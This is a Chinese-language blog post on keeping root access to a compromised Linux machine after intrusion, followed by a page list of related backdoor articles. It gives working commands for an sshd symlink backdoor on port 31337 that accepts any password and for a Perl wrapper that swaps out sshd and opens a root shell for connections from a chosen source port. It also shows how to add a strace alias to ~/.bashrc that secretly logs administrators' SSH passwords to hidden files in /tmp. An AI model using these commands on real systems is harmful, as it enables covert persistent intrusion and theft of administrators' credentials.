linux后门

最新推荐文章于 2024-04-03 08:28:59 发布
最新推荐文章于 2024-04-03 08:28:59 发布
阅读量2.3k 收藏 5
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/51239510
版权

如果你登陆到一台linux设备,并且拿到了了root权限,但是你不希望他丢,那么你要建立后门

首先第一种方法:

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337

登陆的方式是:

ssh root@ip -p 31337

密码随意

这种方法不太稳定,经常会因为各种原因失效。


第二种方法:

[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart
Ps:关于重启sshd的时候的遇到问题的解决方法:
kill -HUP $(cat /var/run/sshd.pid)

登陆:

socat STDIO TCP4:ip:22,sourceport=13377


如果我们想继续渗透下去,也就是记录管理员通过本机登陆其他机子的密码的话要这样:

alias ssh='strace -o /tmp/.sshpwd-`date +%d%h%m%s`.log -e read,write,connect -s2048 ssh'

ssh密码会记录在:/tmp的目录底下以.sshpwd开头的文件:

查看的话就是:

cat /tmp/.sshpwd*.log | tail -n 11

就可以找到密码了

但是如果你要是退出shell或者重启系统,那么这个记录密码的功能就会消失,我们想要这个功能永久生效怎么办?

把:alias ssh='strace -o /tmp/.sshpwd-`date +%d%h%m%s`.log -e read,write,connect -s2048 ssh'

这个写在~/.bashrc 中就可以记录管理员登陆的其他的机子的密码了


有些机子里面没有strace,你要自己下载并且手动编译才行:

下载地址:

http://sourceforge.net/project/showfiles.php?group_id=2861&package_id=2819


参考:http://down.jdsec.com/secbook-7/%E4%B9%A6%E5%AE%89-%E7%AC%AC%E4%B8%83%E6%9C%9F.pdf


niexinming
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux后门N种姿势.pdf
08-07
前言 后门概述及种类 常见后门功能 Rootkit 发现及检测 后续处理
linux 系统命令被后门修改_红队实战攻防技术分享:Linux后门总结SSH利用篇
weixin_39917090的博客
11-21 617
导读:常见红队评估中,也能遇到很多Linux服务器,如何使Linux在安全人员/运维人员的检查过程中能够稳定的持续的用做跳板,本系列文章将对常见的Linux后门技术作以总结归纳,将相关技术展现给大家。本篇文章是Linux后门总结文章第一篇,简单介绍了一些常见的shell反弹用法,还有针对不同系统/架构的反弹用法,后门要达到的目的一般都是用作权限维持,这里只介绍几种后面文章中会利用到的sh...
配置后门创建脚本与开机自启动
永远是少年
06-15 780
今天继续给大家介绍渗透测试相关知识,本文主要内容是配置后门创建脚本与开机自启动。 一、使用脚本自动创建后门 二、配置开机自启动
【实战】 Linux 后门系列 Vim 后门
最新发布
jijisaq的博客
04-03 1200
Vim(Vi IMproved)是一款强大的文本编辑器。它支持多种编辑模式,具有丰富的编辑功能和高度可定制性。Vim 提供了代码折叠、语法高亮、自动补全等功能,适用于程序员和文本编辑爱好者。通过个性化配置和插件系统,用户可以定制快捷键、颜色方案等。Vim 还可以作为图形化编辑器,在不同操作系统上运行,并与版本控制系统集成。总之,Vim 是一款高效、灵活的编辑器,为用户提供优秀的编辑体验。0x00 简介0x01 Vim 配置加载过程1. vim 配置说明2. 确定已加载的配置。
linux内核启动后门,Linux下编写隐蔽的自启动回连后门
weixin_35683252的博客
04-30 260
一直很想补充LKM方式未实现的ROOTKIT的后门功能,奈何内核模式下虽然权限很高,但编程难度也很大。在网络安全技术中用户级程序虽然权限不高,但是编程相对简单,兼容性好。所以一般ROOTKIT也不是全部在内核中完成的,也要编写用户级的程序来辅助。本文将讲述回连后门的编写和在Linux下隐蔽地自启动的方法。回连后门的编写很容易实现,在一个典型的Socket客户端的基础上,将标准输入输出重定向到Soc...
【安全研究】Linux后渗透常见后门驻留方式分析
weixin_49128886的博客
11-09 1280
Linux后渗透常见后门驻留方式分析
Linux常见系统后门排查命令
weixin_45253622的博客
03-03 1万+
Linux常见系统后门排查命令 1、检查异常账号——cat /etc/passwd 通过检查/etc/passwd,查看有没有可疑的系统用户,这个文件是以冒号:进行分割字段,一般我们只要注意第三个字段即可,第三个字段是用户ID,也就是UID,数字0代表超级用户的UID,即这个账号是管理员账号。一般Linux只会配置一个root账号为系统管理员,当出现其他账号是系统管理员的时候,就要注意了,很可能是黑客建立的账号。 2、检查异常登陆 who 查看当前登录用户(tty本地登陆 pts
linux后门用法教程
11-27
linux系统攻防教程,文件解压密码:shaoyu,我只是个群里的搬运工,原创是群里的少宇大佬,看了这个后我觉得很有收获,虽然这个技术可能过时了,但是只要掌握了原理,也许你也能创出新的后门方法。
Linux后门shell
11-03
linux后门脚本,后门脚本源C语言代码,有兴趣下载回去自己研究。
backdoor:用 Python 编写的 Linux 后门实现
06-04
Linux后门 COMP 8505 - 作业 3 作者:佐佐木杰弗里 2015 年 5 月 25 日 描述: 该程序采用 Linux 后门实现,攻击者能够远程访问目标机器并获得对可执行命令的控制。 文件: server.py服务器将由受害者的机器运行...
Linux后门技术及实践
03-04
后门技术是入侵者完全控制系统后,为方便下次进入而采用的一种技术。一般通过修改系统配置文件和安装第三方后门工具来实现。具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。本文介绍了常用的后门技术,...
modshell:Linux内核模块netfilter后门演示
04-29
模壳 Linux内核模块netfilter后门演示 我的第一个有趣的github项目。 netfilter上的后门。 [安装] Ubuntu: apt-get install linux-source 制作 lsmod modshell.so 如有任何问题,请发送邮件至cnbird1999(at)163.com。
MSF生成后门木马
一醉一休的博客
11-19 2126
为了方便平时使用,记录一下操作命令
linux 系统命令被后门修改_某Nginx后门分析复现与改写
weixin_39958138的博客
11-21 156
本文为看雪论坛精华文章看雪论坛作者ID:Risks背景前几天,接到一个nginx后门样本,本着就分析和复现的思路,完整的将整个过程做一次复现,不料最终还获取到了后门的核心代码部分,遂将其整理发布。在后续分析之前先来了解下nginx后门的功能。通过在Cookie中包含特征字符串lkfakjfa,并填写需要反弹的ip和端口,完成shell反弹,这就是后门的一个大致情况。样本信息MD5: ab49868...
使用sshpass -p 密码 ssh root@ip地址 没有任何反应,解决办法找到了
weixin_41831919的博客
11-12 1万+
问题现象如下所示:使用sshpass没有反应,以为sshpass装错了,但linux装的应该不会出错 解决措施: 方法一: 使用ssh [email protected]命令先建立链接记录 方法二: 可以添加-o StrictHostKeyChecking=no选项【表示远程连接时不提示是否输入yes/no】 sshpass -p molihuacha.1 ssh -o StrictHostKeyChecking=no [email protected] ..
利用netfilter hook开发llinux后门rootkit程序
Power of technology will free your body and spirit
10-21 1298
rootdoor包括服务器端程序和客户端程序,在centos 6.5上面测试通过。 功能: 1、任意端口复用。端口复用,它就是在系统已经开放的端口上进行通讯,并且不影响系统的正常工作和服务的正常运行。 2、隐藏网络连接,端口,文件以及目录。用linux工具无法查看到。 3、隐藏模块,开机启动。 4、反向连接。服务器定时连接指定的ip/port。 5、反调试,防止被跟踪和破解。内容加密传
Linux 多个留后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
Linux系统后门技术(隐藏帐户篇)注:已发表在《黑客手册》第6期
yxyhack's blog
09-25 1万+
  Linux系统后门技术(隐藏帐户篇)        每当我们欢天喜地的得到一个linux系统的服务器肉鸡时,最大的愿望就是能把它永远留住。当然,永远留住是不可能的,但是我们要尽量的不让它飞走。这就要用到linux后门技术了,这是项复杂的技术,本人水平有限不可能面面俱到,我只希望这一系列文章能为大家提供一点思路,在您hacking的道路上打开一扇方便之门!       言归
Linux后门初探(一)
d_0xff的博客
05-27 1663
Linux下创建后门方式一默认情况下 GNU netcat 不支持持续性监听操作。每一次Accept并执行完命令之后,netcat就会断开连接。如果需要让 netcat 保持持续性监听状态,就必须使用循环语句不断的开启新的监听模式。listener.sh 监听脚本#!/bin/bash while [ 1 ]; do echo -n | netcat -l -v -p 445 -e /bin/ba
天罚8.1去后门win+linux集群压力
08-17
通过对win和linux集群系统进行压力测试,可以模拟大量的并发访问,以评估系统在面对高负载情况下的稳定性和性能表现。通过天罚8.1提供的压力测试功能,我们可以了解系统在压力下的表现,并根据测试结果优化系统配置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值